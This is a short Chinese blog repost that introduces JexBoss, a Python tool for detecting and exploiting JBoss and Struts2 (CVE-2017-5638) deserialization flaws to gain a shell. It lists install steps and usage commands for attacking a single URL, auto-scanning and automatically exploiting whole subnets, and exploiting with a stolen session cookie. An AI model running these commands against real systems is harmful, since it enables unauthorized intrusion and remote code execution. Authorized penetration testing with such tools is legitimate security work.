标签:## jexboss py Jboss 漏洞 xx 随记 python2
Jboss漏洞检测利用工具
Jexboss是一个使用Python编写的Jboss漏洞检测利用工具,通过它可以检测并利用web-console,jmx-console,JMXInvokerServlet这三个漏洞,并且可以获得一个shell。
工具下载:https://github.com/joaomatosf/jexboss
此工具除了可以对Jboss框架进行漏洞检测,还可以对其它Java平台、框架、应用等反序列化漏洞进行检测。
0x01 安装方法
## 克隆项目至本地
git clone https://github.com/joaomatosf/jexboss.git
## 切换至项目根目录
cd jexboss
## 安装项目所需要的依赖
pip2 install -r requires.txt
## 使用
python2 jexboss.py -h
0x02 使用方法
## 攻击目标网站
python2 jexboss.py -u http://192.168.0.26:8080
## 网络扫描模式
python2 jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt
## 自动化漏洞利用的网络扫描模式
python2 jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt
## 自动化漏洞利用的网络扫描模式(多端口)
python2 jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080,80,8888 -results results_auto_scan.txt
## 批量扫描
python2 jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log
## 针对 Apache Struts2(CVE-2017-5638漏洞)
python2 jexboss.py -u http://xx.xx.xx.xx/xxx.action --struts2
## 带Cookie的CVE-2017-5638漏洞利用
python2 jexboss.py -u http://xx.xx.xx.xx/xxx.action --struts2 --cookie "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
标签:##,jexboss,py,Jboss,漏洞,xx,随记,python2 来源: https://blog.csdn.net/zhanglichon666/article/details/110734486
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。